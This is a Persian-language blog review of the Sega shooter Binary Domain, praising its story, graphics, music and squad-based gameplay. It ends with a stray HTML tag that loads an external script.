تبلیغات
بازیکده - نقد بازی قلمروی ربات ها

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

پنجشنبه 4 اسفند 1390-05:51 ب.ظBinary Domain از جمله ساخته های جدیدی از است که از طرف سازندگان سری بازی های Yakuza راهی بازار شده است. عملکرد این استودیو در کارهای قبلی آن ها به خوبی دیده شده و کسی در این موضوع شکی ندارد که آن ها یکی از بهترین استودیوهای بازیسازی کمپانی Sega هستند. بازی BD عنوانی است که کاملاً با آن چیزی که از این استودیو دیده ایم، تفاوت دارد. این بازی یکی از IPهای جدید کمپانی Sega به حساب می آید که در سطح بسیار خوبی ساخته شده است.

 

داستان

داستان Binary Domain یکی از رویاهای دیرینه انسان ها را به واقعیت تبدیل کرده که در آن بشر موفق به ساخت ربات هایی شده که ظاهری همانند انسان ها دارند و حتی توانایی درک احساس نیز به آن ها داده شده است. ربات هایی که حتی خودشان نیز فکر می کنند که یک انسان واقعی هستند و مانند سایر انسان ها برای خودشان زندگی دارند و در مقام های مختلف فعالیت می کنند. اما اتفاقی مرموز باعث می شوند که این جریان به یک بحران غیر قابل تصور برای نسل بشر تبدیل شود. دولت آمریکا برای اینکه بتواند جلوی این تهدید را بگیرد، گروهی را راهی ژاپن می کند.

ژاپن جایی است که خالق این ربات های بسیار پیشرفته در آنجا زندگی می کند، اما تنها تصویری که از او موجود است، مربوط به 40 سال پیش از این اتفاقات می شود. بازیکنان در نقش این گروه حرفه ای که در قبال گرفتن پول، مأموریت های مختلفی را انجام می دهند، راهی ژاپن می شوند تا راه حل مبارزه با این ربات ها را پیدا کنند و پرده از راز این ماجرا بردارند. داستان بازی، گر چه در نگاه اول کلیشه ای است، اما رفته رفته بازیکنان را جذب خودش می کند. اتفاقات جالبی در بازی رخ می دهند که همه چیز را بسیار هیجان انگیز می کنند. تیم سازنده این بازی، همانند سری بازی های Yakuza داستان بسیار خوبی را برای این عنوان خلق کرده اند که باعث شده بازی کشش بسیار بالایی در جذب بازیکنان داشته باشد.

گرافیک

اگر بازی های قبلی سازندگان BD را تجربه کرده باشید، حتماً به گرافیک خوب آن ها پی برده اید. BD نیز با همان گرافیک طراحی شده و گر چه نمی توان از آن به عنوان یک گرافیک عالی نام برد، اما می توان آن را در سطح بسیار خوبی قلمداد کرد. سازندگان بازی تا جایی که توانسته اند، از تکنیک های خوبی برای زیباتر کردن گرافیک بازی استفاده کرده اند. از همان مرحله ابتدایی بازی، شاهد این موضوع خواهید بود که توجه به جزئیات و رعایت حداقل ها برای داشتن یک گرافیک خوب در بازی رعایت شده است. کیفیت بافت ها در سطح بسیار خوبی دارد و جزئیات به خوبی در آن ها دیده می شوند. جلوه های ویژه مانند برخورد گلوله با اجسام فلزی و یا اشیاء مختلف، بسیار خوب طراحی شده اند.

انفجارها نیز از دیگر قسمت های قابل قبول بازی به حساب می آیند. طراحی ربات هایی که در طول بازی با آن ها مواجه می شوید، واقعاً خوب است و تنوع خوبی را در آن ها مشاهده می کنید. البته طراحی ربات های بزرگ که نقش Boss را در بازی ایفا می کنند، بسیار عالی از کار درآمده است. در طراحی ربات ها به این موضوع توجه شده که آن ها واقعاً از تکه های آهن و پیچ و مهره تشکیل شده اند و به همین دلیل زمانی که از بین می روند، شاهد تکه تکه شدن آن ها به قطعات کوچکتر خواهید بود. تنوع مراحل بازی بسیار خوب است و اکثر مراحل از جزئیات خوبی تشکیل شده اند. گرافیک بازی در حالت کلی در سطح خوبی قرار دارد، اما در مقایسه با بازی های مطرح، چندان نمی تواند قدرت نمایی کند. البته همان طور که به آن اشاره کردیم، این موضوع دلیلی بر این نیست که بازی گرافیک بدی دارد.

موسیقی/صداگذاری

موسیقی های ساخته شده برای این عنوان به وسیله میتسوهارو فوکویاما (Mitsuharu Fukuyama) ساخته شده که آثار قبلی او را در سری بازی های Yakuza شنیده اید. موسیقی ها به شدت با فضای بازی همخوانی دارند و همین موضوع باعث شده تا هیجان به خوبی به بازیکنان منتقل شود. افکت های صوتی بازی نیز از دیگر قسمت های قابل قبول این عنوان هستند. صداها از کیفیت خوبی برخوردار هستند. در کنار این موضوع، صداگذاری مطلوبی نیز روی شخصیت های بازی قرار دارد. صداگذاران به خوبی توانسته اند بجای شخصیت های بازی صحبت کنند. البته باید به این موضوع اشاره کرد که دیالوگ های بسیار خوبی نیز برای آن ها تهیه شده اند. در طول بازی گفتگوهای مختلفی بین شخصیت های بازی رد و بدل می شوند که گوش دادن به آن ها خالی از لطف نیست.

گیم پلی

Binary Domain یک اکشن سوم-شخص استاندارد است که مانند آن را در بسیاری از بازی های موجود در بازار می توانید مشاهده کنید، اما المان هایی در این بازی وجود دارند که باعث شده این عنوان دارای قسمت هایی باشد که مخصوص به خودش است. در نگاه اول، BD شباهت زیادی به بازی Vanquish دارد. البته این شباهت به این دلیل است که در هر دوی این بازی ها تفکر ژاپنی موج می زند و این موضوع یعنی اینکه مبارزه با موجوداتی بسیار بزرگ و عجیب و غریب حتماً در بازی قرار دارد. اما BD یک روند اکشن بسیار خوب را پیش روی شما قرار می دهد.

اکشن بازی شامل مبارزه با ربات های مختلف و Boss Fightهایی می شود که مانند آن را در کمتر بازی ای می توانید مشاهده کنید. در طول بازی همیشه، هم گروهی شما در کنارتان قرار دارد و آماده است که دستورات شما را اجرا کند. یکی از قسمت های جالب توجه بازی این است که اگر میکروفن داشته باشید، می توانید دیالوگ های خاصی را که برای دستور دادن هم تیمی هایتان است را بیان کنید. این موضوع امکان بسیار خوبی است که می تواند از جمله قسمت های جالب بازی باشد، اما اگر میکروفن نداشته باشید، این فرمان ها را باید به وسیله فشار دادن دکمه های مخصوص بدهید. البته باید به این موضوع اشاره کرد که در صورت نداشتن میکروفن، تعداد این فرمان ها کمتر می شود. بازی شباهت هایی نیز به عنوان Army of Two دارد. همیشه باید با یارتان حرکت کنید تا بتوانید در برابر ربات ها جان سالم به در ببرید.

اگر هم سلامتی شما به خطر افتاد، این قابلیت در بازی قرار گرفته که یا خودتان را درمان کنید و یا منتظر کمک یارتان باشید. از دیگر قسمت های خوبی که برای گیم پلی طراحی شده، می توان به انیمیشن های خوبی اشاره کرد که برای شخصیت های بازی طراحی شده اند. شخصیت های بازی بسیار نرم و روان حرکت می کنند و این موضوع روی هیجان انگیز شدن گیم پلی بازی تأثیر زیادی گذاشته است. شکل پنهان شدن پشت جان پناه های مختلف و نحوه تیراندازی نیز در این بازی بسیار منحصر به فرد است و این موضوع یکی از قسمت هایی است که فقط در این بازی خواهید دید. BD یک عنوان بسیار هیجان انگیز و دوست داشتنی است که می تواند شما را با یک اکشن سرسام آور مواجه کند. همچنین این بازی را می توانید به صورت Co-op با دوستانتان بازی کنید تا هیجان بیشتری را تجربه کنید.

نتیجه گیری

بازی Binary Domain یک عنوان خوب و موفق برای Sega به حساب می آید و بار دیگر نشان می دهد که استودیوی ژاپنی سازنده این عنوان، می داند که بازی خوب باید به چه صورت باشد. البته شاید این بازی در نگاه اول ترکیبی از Vanquish و Army of Two را پیش روی شما قرار دهد، اما با پیشرفت در بازی مشاهده خواهید کرد که BD یک نمایش تازه و بسیار خوب را از سوژه های مختلف را پیش روی بازیکنان قرار می دهد که به نظر نمی رسد تا مدتی دیگر کسی بتواند دست به چنین کاری بزند.
تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >